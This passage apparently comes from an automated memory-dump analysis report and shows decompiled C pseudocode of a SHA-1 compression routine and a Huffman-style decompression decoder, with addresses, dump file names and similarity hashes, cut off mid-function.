          				} while (_v24 != 0xf);
          				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
          				asm("rol edx, 1");
          				asm("rol ecx, 0x5");
          				 *_t839 = _t769;
          				_t454 = ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t769 + _a16 + 0x5a827999;
          				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
          				_a16 = _t454;
          				asm("rol edx, 1");
          				asm("rol ecx, 0x5");
          				asm("ror ebx, 0x2");
          				_t839[1] = _t773;
          				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
          				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _a12 + 0x5a827999;
          				asm("ror esi, 0x2");
          				_a8 = _t460;
          				asm("rol edx, 1");
          				asm("rol ecx, 0x5");
          				_t839[2] = _t777;
          				_t466 = ((_t851 ^ _t593) & _a16 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
          				_t887 = _a16;
          				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
          				_v28 = _t466;
          				asm("ror ebp, 0x2");
          				_a16 = _t887;
          				_t888 = _a8;
          				asm("rol edx, 1");
          				asm("rol ecx, 0x5");
          				_t839[3] = _t781;
          				asm("ror ebp, 0x2");
          				_t782 = 0x11;
          				_a12 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
          				_a8 = _t888;
          				_v16 = _t782;
          				do {
          					_t89 = _t782 + 5; // 0x16
          					_t474 = _t89;
          					_v8 = _t474;
          					_t91 = _t782 - 5; // 0xc
          					_t92 = _t782 + 3; // 0x14
          					_t890 = _t92 & 0x0000000f;
          					_t595 = _t474 & 0x0000000f;
          					_v12 = _t890;
          					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
          					asm("rol edx, 1");
          					_t839[_t890] = _t786;
          					_t891 = _v28;
          					asm("rol ecx, 0x5");
          					asm("ror ebp, 0x2");
          					_v28 = _t891;
          					_t482 = _v16;
          					_v24 = _t851 + (_a16 ^ _a8 ^ _t891) + 0x6ed9eba1 + _a12 + _t786;
          					_t854 = _v20;
          					_t787 = 0xf;
          					_t841 = _t482 + 0x00000006 & _t787;
          					_t893 = _t482 + 0x00000004 & _t787;
          					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
          					asm("rol edx, 1");
          					 *(_t854 + _t893 * 4) = _t791;
          					_t855 = _a12;
          					asm("rol ecx, 0x5");
          					asm("ror esi, 0x2");
          					_a12 = _t855;
          					_t489 = _v16;
          					_a16 = _a16 + 0x6ed9eba1 + (_a8 ^ _v28 ^ _t855) + _v24 + _t791;
          					_t857 = _t489 + 0x00000007 & 0x0000000f;
          					_t670 = _v20;
          					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
          					asm("rol edx, 1");
          					 *(_t670 + _t595 * 4) = _t796;
          					_t596 = _v24;
          					asm("rol ecx, 0x5");
          					asm("ror ebx, 0x2");
          					_v24 = _t596;
          					_t597 = _v20;
          					_a8 = _a8 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _a12) + _a16 + _t796;
          					asm("rol ecx, 0x5");
          					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
          					asm("rol edx, 1");
          					 *(_t597 + _t841 * 4) = _t800;
          					_t598 = _a16;
          					_t839 = _v20;
          					asm("ror ebx, 0x2");
          					_a16 = _t598;
          					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _a12) + _a8 + _t800;
          					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
          					_t894 = _a8;
          					asm("rol edx, 1");
          					_t839[_t857] = _t804;
          					_t851 = _v24;
          					asm("rol ecx, 0x5");
          					_t782 = _v8;
          					asm("ror ebp, 0x2");
          					_a8 = _t894;
          					_a12 = _a12 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
          					_v16 = _t782;
          				} while (_t782 + 3 <= 0x23);
          				_t858 = 0x25;
          				_v16 = _t858;
          				while(1) {
          					_t199 = _t858 + 5; // 0x2a
          					_t512 = _t199;
          					_t200 = _t858 - 5; // 0x20
          					_v4 = _t512;
          					_t202 = _t858 + 3; // 0x28
          					_t806 = _t202 & 0x0000000f;
          					_v8 = _t806;
          					_t896 = _t512 & 0x0000000f;
          					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
          					asm("rol esi, 1");
          					_t599 = _v28;
          					_t839[_t806] = _t862;
          					asm("rol edx, 0x5");
          					asm("ror ebx, 0x2");
          					_t863 = 0xf;
          					_v28 = _t599;
          					_v24 = _a12 - 0x70e44324 + ((_a8 | _v28) & _t598 | _a8 & _t599) + _t862 + _v24;
          					_t519 = _v16;
          					_t601 = _t519 + 0x00000006 & _t863;
          					_t809 = _t519 + 0x00000004 & _t863;
          					_v12 = _t809;
          					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
          					asm("rol esi, 1");
          					_t839[_t809] = _t867;
          					_t842 = _a12;
          					_t810 = _v24;
          					asm("rol edx, 0x5");
          					asm("ror edi, 0x2");
          					_a12 = _t842;
          					_t243 = _t810 - 0x70e44324; // -1894007573
          					_t811 = _v20;
          					_a16 = _t243 + ((_v28 | _t842) & _a8 | _v28 & _t842) + _t867 + _a16;
          					_t526 = _v16;
          					_t844 = _t526 + 0x00000007 & 0x0000000f;
          					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
          					asm("rol esi, 1");
          					 *(_t811 + _t896 * 4) = _t871;
          					_t897 = _v24;
          					asm("rol edx, 0x5");
          					asm("ror ebp, 0x2");
          					_t814 = _a16 + 0x8f1bbcdc + ((_t897 | _a12) & _v28 | _t897 & _a12) + _t871 + _a8;
          					_v24 = _t897;
          					_t898 = _v20;
          					_a8 = _t814;
          					asm("rol edx, 0x5");
          					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
          					asm("rol esi, 1");
          					 *(_t898 + _t601 * 4) = _t875;
          					_t598 = _a16;
          					asm("ror ebx, 0x2");
          					_a16 = _t598;
          					_t815 = _t814 + ((_v24 | _t598) & _a12 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
          					_v28 = _t815;
          					asm("rol edx, 0x5");
          					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
          					asm("rol esi, 1");
          					 *(_t898 + _t844 * 4) = _t879;
          					_t899 = _a8;
          					_t845 = _v24;
          					asm("ror ebp, 0x2");
          					_a8 = _t899;
          					_t858 = _v4;
          					_a12 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _a12;
          					_v16 = _t858;
          					if(_t858 + 3 > 0x37) {
          						break;
          					}
          					_t839 = _v20;
          				}
          				_t816 = 0x39;
          				_v16 = _t816;
          				do {
          					_t310 = _t816 + 5; // 0x3e
          					_t546 = _t310;
          					_v8 = _t546;
          					_t312 = _t816 + 3; // 0x3c
          					_t313 = _t816 - 5; // 0x34
          					_t880 = 0xf;
          					_t901 = _t312 & _t880;
          					_t603 = _t546 & _t880;
          					_t881 = _v20;
          					_v4 = _t901;
          					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
          					asm("rol edx, 1");
          					 *(_t881 + _t901 * 4) = _t820;
          					_t902 = _v28;
          					asm("rol ecx, 0x5");
          					asm("ror ebp, 0x2");
          					_v28 = _t902;
          					_v24 = (_a16 ^ _a8 ^ _t902) + _t820 + _t845 + _a12 + 0xca62c1d6;
          					_t555 = _v16;
          					_t821 = 0xf;
          					_t847 = _t555 + 0x00000006 & _t821;
          					_t904 = _t555 + 0x00000004 & _t821;
          					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
          					asm("rol edx, 1");
          					 *(_t881 + _t904 * 4) = _t825;
          					_t882 = _a12;
          					asm("rol ecx, 0x5");
          					_a16 = (_a8 ^ _v28 ^ _t882) + _t825 + _a16 + _v24 + 0xca62c1d6;
          					_t564 = _v16;
          					asm("ror esi, 0x2");
          					_a12 = _t882;
          					_t884 = _t564 + 0x00000007 & 0x0000000f;
          					_t741 = _v20;
          					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
          					asm("rol edx, 1");
          					 *(_t741 + _t603 * 4) = _t830;
          					_t604 = _v24;
          					asm("rol ecx, 0x5");
          					asm("ror ebx, 0x2");
          					_v24 = _t604;
          					_t605 = _v20;
          					_a8 = (_t604 ^ _v28 ^ _a12) + _t830 + _a8 + _a16 + 0xca62c1d6;
          					asm("rol ecx, 0x5");
          					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
          					asm("rol edx, 1");
          					_t605[_t847] = _t834;
          					_t845 = _v24;
          					asm("ror dword [esp+0x3c], 0x2");
          					_v28 = (_t845 ^ _a16 ^ _a12) + _t834 + _v28 + _a8 + 0xca62c1d6;
          					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
          					_t905 = _a8;
          					asm("rol edx, 1");
          					_t605[_t884] = _t838;
          					_t606 = _a16;
          					_t885 = _v28;
          					asm("ror ebp, 0x2");
          					_t816 = _v8;
          					asm("rol ecx, 0x5");
          					_a8 = _t905;
          					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _a12;
          					_v16 = _t816;
          					_a12 = _t752;
          				} while (_t816 + 3 <= 0x4b);
          				_t592 = _a4;
          				_t592[1] = _t592[1] + _t885;
          				_t592[2] = _t592[2] + _t905;
          				_t592[3] = _t592[3] + _t606;
          				 *_t592 =  *_t592 + _t752;
          				_t592[4] = _t592[4] + _t845;
          				return _t592;
          			}

          0x001ff0c4
          0x001ff0ce
          0x001ff0d1
          0x001ff0d3
          0x001ff0da
          0x001ff0de
          0x001ff0f3
          0x001ff0fc
          0x001ff100
          0x001ff104
          0x001ff129
          0x001ff132
          0x001ff135
          0x001ff137
          0x001ff13a
          0x001ff148
          0x001ff155
          0x001ff172
          0x001ff175
          0x001ff179
          0x001ff17b
          0x001ff17e
          0x001ff184
          0x001ff18c
          0x001ff195
          0x001ff199
          0x001ff1a2
          0x001ff1a6
          0x001ff1a8
          0x001ff1af
          0x001ff1b3
          0x001ff1bc
          0x001ff1c0
          0x001ff1c3
          0x001ff1c6
          0x001ff1c9
          0x001ff1cb
          0x001ff1d5

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
          • Instruction ID: 3ce65ffbd96706f27cde53e31ee44b83a9926ceea82062cdbc2a895513defe11
          • Opcode Fuzzy Hash: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
          • Instruction Fuzzy Hash: 7D5249B26087019FC758CF19C891A6AF7E1FFC8304F49892DF9968B255D734E919CB82
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 88%
          			E002066A2(signed int __ecx) {
          				void* __ebp;
          				signed int _t201;
          				signed int _t203;
          				signed int _t205;
          				signed int _t206;
          				signed int _t207;
          				signed int _t209;
          				signed int _t210;
          				signed int _t212;
          				signed int _t214;
          				signed int _t215;
          				signed int _t216;
          				signed int _t218;
          				signed int _t219;
          				signed int _t220;
          				signed int _t221;
          				unsigned int _t223;
          				signed int _t233;
          				signed int _t237;
          				signed int _t240;
          				signed int _t241;
          				signed int _t242;
          				signed int _t244;
          				signed int _t245;
          				signed short _t246;
          				signed int _t247;
          				signed int _t250;
          				signed int* _t251;
          				signed int _t253;
          				signed int _t254;
          				signed int _t255;
          				unsigned int _t256;
          				signed int _t259;
          				signed int _t260;
          				signed int _t261;
          				signed int _t263;
          				signed int _t264;
          				signed short _t265;
          				unsigned int _t269;
          				unsigned int _t274;
          				signed int _t279;
          				signed short _t280;
          				signed int _t284;
          				void* _t291;
          				signed int _t293;
          				signed int* _t295;
          				signed int _t296;
          				signed int _t297;
          				signed int _t301;
          				signed int _t304;
          				signed int _t305;
          				signed int _t308;
          				signed int _t309;
          				signed int _t310;
          				intOrPtr _t313;
          				intOrPtr _t314;
          				signed int _t315;
          				unsigned int _t318;
          				void* _t320;
          				signed int _t323;
          				signed int _t324;
          				unsigned int _t327;
          				void* _t329;
          				signed int _t332;
          				void* _t335;
          				signed int _t338;
          				signed int _t339;
          				intOrPtr* _t341;
          				void* _t342;
          				signed int _t345;
          				signed int* _t349;
          				signed int _t350;
          				unsigned int _t354;
          				void* _t356;
          				signed int _t359;
          				void* _t363;
          				signed int _t366;
          				signed int _t367;
          				unsigned int _t370;
          				void* _t372;
          				signed int _t375;
          				intOrPtr* _t377;
          				void* _t378;
          				signed int _t381;
          				void* _t384;
          				signed int _t388;
          				signed int _t389;
          				intOrPtr* _t391;
          				void* _t392;
          				signed int _t395;
          				void* _t398;
          				signed int _t401;
          				signed int _t402;
          				intOrPtr* _t404;
          				void* _t405;
          				signed int _t408;
          				signed int _t414;
          				unsigned int _t416;
          				unsigned int _t420;
          				signed int _t423;
          				signed int _t424;
          				unsigned int _t426;
          				unsigned int _t430;
          				signed int _t433;
          				signed int _t434;
          				void* _t435;
          				signed int _t436;
          				intOrPtr* _t438;
          				signed char _t440;
          				signed int _t442;
          				intOrPtr _t443;
          				signed int _t446;
          				signed int _t447;
          				signed int _t448;
          				void* _t455;
          
          				_t440 =  *(_t455 + 0x34);
          				 *(_t455 + 0x14) = __ecx;
          				if( *((char*)(_t440 + 0x2c)) != 0) {
          					L3:
          					_t313 =  *((intOrPtr*)(_t440 + 0x18));
          					_t438 = _t440 + 4;
          					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
          					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
          						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
          						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
          						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
          						 *(_t455 + 0x14) = _t201;
          						 *(_t455 + 0x10) = _t414;
          						_t293 = _t201;
          						__eflags = _t201 - _t414;
          						if(_t201 >= _t414) {
          							_t293 = _t414;
          						}
          						 *(_t455 + 0x3c) = _t293;
          						while(1) {
          							_t314 =  *_t438;
          							__eflags = _t314 - _t293;
          							if(_t314 < _t293) {
          								goto L15;
          							}
          							L9:
          							__eflags = _t314 - _t201;
          							if(__eflags > 0) {
          								L93:
          								L94:
          								return _t201;
          							}
          							if(__eflags != 0) {
          								L12:
          								__eflags = _t314 - _t414;
          								if(_t314 < _t414) {
          									L14:
          									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
          									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
          										L92:
          										 *((char*)(_t440 + 0x4ad3)) = 1;
          										goto L93;
          									}
          									goto L15;
          								}
          								__eflags =  *((char*)(_t440 + 0x4ad2));
          								if( *((char*)(_t440 + 0x4ad2)) == 0) {
          									goto L92;
          								}
          								goto L14;
          							}
          							_t201 =  *(_t440 + 8);
          							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
          							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
          								goto L93;
          							}
          							goto L12;
          							L15:
          							_t315 =  *(_t440 + 0x4adc);
          							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
          							if( *(_t440 + 0x4ad8) > _t315 - 8) {
          								_t284 = _t315 + _t315;
          								 *(_t440 + 0x4adc) = _t284;
          								_push(_t284 * 0xc);
          								_push( *(_t440 + 0x4ad4));
          								_t310 = E00212B5E(_t315, _t414);
          								__eflags = _t310;
          								if(_t310 == 0) {
          									E001F6D3A(0x2300e0);
          								}
          								 *(_t440 + 0x4ad4) = _t310;
          							}
          							_t203 =  *(_t440 + 0x4ad8);
          							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
          							 *(_t455 + 0x24) = _t295;
          							 *(_t440 + 0x4ad8) = _t203 + 1;
          							_t205 = E001FA4ED(_t438);
          							_t206 =  *(_t440 + 0xb4);
          							_t416 = _t205 & 0x0000fffe;
          							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
          							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
          								_t442 = 0xf;
          								_t207 = _t206 + 1;
          								__eflags = _t207 - _t442;
          								if(_t207 >= _t442) {
          									L27:
          									_t318 =  *(_t438 + 4) + _t442;
          									 *(_t438 + 4) = _t318 & 0x00000007;
          									_t209 = _t318 >> 3;
          									 *_t438 =  *_t438 + _t209;
          									_t320 = 0x10;
          									_t443 =  *((intOrPtr*)(_t455 + 0x1c));
          									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
          									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
          									asm("sbb eax, eax");
          									_t210 = _t209 & _t323;
          									__eflags = _t210;
          									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
          									goto L28;
          								}
          								_t404 = _t440 + 0x34 + _t207 * 4;
          								while(1) {
          									__eflags = _t416 -  *_t404;
          									if(_t416 <  *_t404) {
          										break;
          									}
          									_t207 = _t207 + 1;
          									_t404 = _t404 + 4;
          									__eflags = _t207 - 0xf;
          									if(_t207 < 0xf) {
          										continue;
          									}
          									goto L27;
          								}
          								_t442 = _t207;
          								goto L27;
          							} else {
          								_t405 = 0x10;
          								_t436 = _t416 >> _t405 - _t206;
          								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
          								 *_t438 =  *_t438 + (_t408 >> 3);
          								 *(_t438 + 4) = _t408 & 0x00000007;
          								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
          								L28:
          								__eflags = _t324 - 0x100;
          								if(_t324 >= 0x100) {
          									__eflags = _t324 - 0x106;
          									if(_t324 < 0x106) {
          										__eflags = _t324 - 0x100;
          										if(_t324 != 0x100) {
          											__eflags = _t324 - 0x101;
          											if(_t324 != 0x101) {
          												_t212 = 3;
          												 *_t295 = _t212;
          												_t295[2] = _t324 - 0x102;
          												_t214 = E001FA4ED(_t438);
          												_t215 =  *(_t440 + 0x2d78);
          												_t420 = _t214 & 0x0000fffe;
          												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
          												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
          													_t296 = 0xf;
          													_t216 = _t215 + 1;
          													__eflags = _t216 - _t296;
          													if(_t216 >= _t296) {
          														L85:
          														_t327 =  *(_t438 + 4) + _t296;
          														 *(_t438 + 4) = _t327 & 0x00000007;
          														_t218 = _t327 >> 3;
          														 *_t438 =  *_t438 + _t218;
          														_t329 = 0x10;
          														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
          														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
          														asm("sbb eax, eax");
          														_t219 = _t218 & _t332;
          														__eflags = _t219;
          														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
          														L86:
          														_t297 = _t220 & 0x0000ffff;
          														__eflags = _t297 - 8;
          														if(_t297 >= 8) {
          															_t221 = 3;
          															_t446 = (_t297 >> 2) - 1;
          															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
          															__eflags = _t446;
          															if(_t446 != 0) {
          																_t223 = E001FA4ED(_t438);
          																_t335 = 0x10;
          																_t301 = _t301 + (_t223 >> _t335 - _t446);
          																_t338 =  *(_t438 + 4) + _t446;
          																 *_t438 =  *_t438 + (_t338 >> 3);
          																_t339 = _t338 & 0x00000007;
          																__eflags = _t339;
          																 *(_t438 + 4) = _t339;
          															}
          														} else {
          															_t301 = _t297 + 2;
          														}
          														( *(_t455 + 0x24))[1] = _t301;
          														L91:
          														_t414 =  *(_t455 + 0x14);
          														_t201 =  *(_t455 + 0x18);
          														_t293 =  *(_t455 + 0x3c);
          														_t443 =  *((intOrPtr*)(_t455 + 0x1c));
          														while(1) {
          															_t314 =  *_t438;
          															__eflags = _t314 - _t293;
          															if(_t314 < _t293) {
          																goto L15;
          															}
          															goto L9;
          														}
          													}
          													_t341 = _t440 + 0x2cf8 + _t216 * 4;
          													while(1) {
          														__eflags = _t420 -  *_t341;
          														if(_t420 <  *_t341) {
          															break;
          														}
          														_t216 = _t216 + 1;
          														_t341 = _t341 + 4;
          														__eflags = _t216 - 0xf;
          														if(_t216 < 0xf) {
          															continue;
          														}
          														goto L85;
          													}
          													_t296 = _t216;
          													goto L85;
          												}
          												_t342 = 0x10;
          												_t423 = _t420 >> _t342 - _t215;
          												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
          												 *_t438 =  *_t438 + (_t345 >> 3);
          												 *(_t438 + 4) = _t345 & 0x00000007;
          												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
          												goto L86;
          											}
          											 *_t295 = 2;
          											L33:
          											_t414 =  *(_t455 + 0x14);
          											_t201 =  *(_t455 + 0x18);
          											_t293 =  *(_t455 + 0x3c);
          											continue;
          										}
          										_push(_t455 + 0x28);
          										E00203564(_t443, _t438);
          										_t295[1] =  *(_t455 + 0x28) & 0x000000ff;
          										_t295[2] =  *(_t455 + 0x2c);
          										_t424 = 4;
          										 *_t295 = _t424;
          										_t233 =  *(_t440 + 0x4ad8);
          										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
          										 *(_t440 + 0x4ad8) = _t233 + 1;
          										_t349[1] =  *(_t455 + 0x34) & 0x000000ff;
          										 *_t349 = _t424;
          										_t349[2] =  *(_t455 + 0x30);
          										goto L33;
          									}
          									_t237 = _t324 - 0x106;
          									__eflags = _t237 - 8;
          									if(_t237 >= 8) {
          										_t350 = 3;
          										_t304 = (_t237 >> 2) - 1;
          										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
          										__eflags = _t237;
          									} else {
          										_t304 = 0;
          									}
          									_t447 = _t237 + 2;
          									 *(_t455 + 0x10) = _t447;
          									__eflags = _t304;
          									if(_t304 != 0) {
          										_t274 = E001FA4ED(_t438);
          										_t398 = 0x10;
          										_t401 =  *(_t438 + 4) + _t304;
          										 *(_t455 + 0x10) = _t447 + (_t274 >> _t398 - _t304);
          										 *_t438 =  *_t438 + (_t401 >> 3);
          										_t402 = _t401 & 0x00000007;
          										__eflags = _t402;
          										 *(_t438 + 4) = _t402;
          									}
          									_t240 = E001FA4ED(_t438);
          									_t241 =  *(_t440 + 0xfa0);
          									_t426 = _t240 & 0x0000fffe;
          									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
          									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
          										_t305 = 0xf;
          										_t242 = _t241 + 1;
          										__eflags = _t242 - _t305;
          										if(_t242 >= _t305) {
          											L49:
          											_t354 =  *(_t438 + 4) + _t305;
          											 *(_t438 + 4) = _t354 & 0x00000007;
          											_t244 = _t354 >> 3;
          											 *_t438 =  *_t438 + _t244;
          											_t356 = 0x10;
          											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
          											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
          											asm("sbb eax, eax");
          											_t245 = _t244 & _t359;
          											__eflags = _t245;
          											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
          											goto L50;
          										}
          										_t391 = _t440 + 0xf20 + _t242 * 4;
          										while(1) {
          											__eflags = _t426 -  *_t391;
          											if(_t426 <  *_t391) {
          												break;
          											}
          											_t242 = _t242 + 1;
          											_t391 = _t391 + 4;
          											__eflags = _t242 - 0xf;
          											if(_t242 < 0xf) {
          												continue;
          											}
          											goto L49;
          										}
          										_t305 = _t242;
          										goto L49;
          									} else {
          										_t392 = 0x10;
          										_t434 = _t426 >> _t392 - _t241;
          										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
          										 *_t438 =  *_t438 + (_t395 >> 3);
          										 *(_t438 + 4) = _t395 & 0x00000007;
          										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
          										L50:
          										_t247 = _t246 & 0x0000ffff;
          										__eflags = _t247 - 4;
          										if(_t247 >= 4) {
          											_t308 = (_t247 >> 1) - 1;
          											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
          											__eflags = _t247;
          										} else {
          											_t308 = 0;
          										}
          										_t250 = _t247 + 1;
          										 *(_t455 + 0x20) = _t250;
          										_t448 = _t250;
          										__eflags = _t308;
          										if(_t308 == 0) {
          											L68:
          											__eflags = _t448 - 0x100;
          											if(_t448 > 0x100) {
          												_t253 =  *(_t455 + 0x10) + 1;
          												 *(_t455 + 0x10) = _t253;
          												__eflags = _t448 - 0x2000;
          												if(_t448 > 0x2000) {
          													_t254 = _t253 + 1;
          													 *(_t455 + 0x10) = _t254;
          													__eflags = _t448 - 0x40000;
          													if(_t448 > 0x40000) {
          														_t255 = _t254 + 1;
          														__eflags = _t255;
          														 *(_t455 + 0x10) = _t255;
          													}
          												}
          											}
          											_t251 =  *(_t455 + 0x24);
          											 *_t251 = 1;
          											_t251[1] =  *(_t455 + 0x10);
          											_t251[2] = _t448;
          											goto L91;
          										} else {
          											__eflags = _t308 - 4;
          											if(__eflags < 0) {
          												_t256 = E00207D76(_t438);
          												_t363 = 0x20;
          												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x20);
          												_t366 =  *(_t438 + 4) + _t308;
          												 *_t438 =  *_t438 + (_t366 >> 3);
          												_t367 = _t366 & 0x00000007;
          												__eflags = _t367;
          												 *(_t438 + 4) = _t367;
          												goto L68;
          											}
          											if(__eflags > 0) {
          												_t269 = E00207D76(_t438);
          												_t384 = 0x24;
          												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x20);
          												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
          												 *_t438 =  *_t438 + (_t388 >> 3);
          												_t389 = _t388 & 0x00000007;
          												__eflags = _t389;
          												 *(_t438 + 4) = _t389;
          											}
          											_t259 = E001FA4ED(_t438);
          											_t260 =  *(_t440 + 0x1e8c);
          											_t430 = _t259 & 0x0000fffe;
          											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
          											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
          												_t309 = 0xf;
          												_t261 = _t260 + 1;
          												__eflags = _t261 - _t309;
          												if(_t261 >= _t309) {
          													L65:
          													_t370 =  *(_t438 + 4) + _t309;
          													 *(_t438 + 4) = _t370 & 0x00000007;
          													_t263 = _t370 >> 3;
          													 *_t438 =  *_t438 + _t263;
          													_t372 = 0x10;
          													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
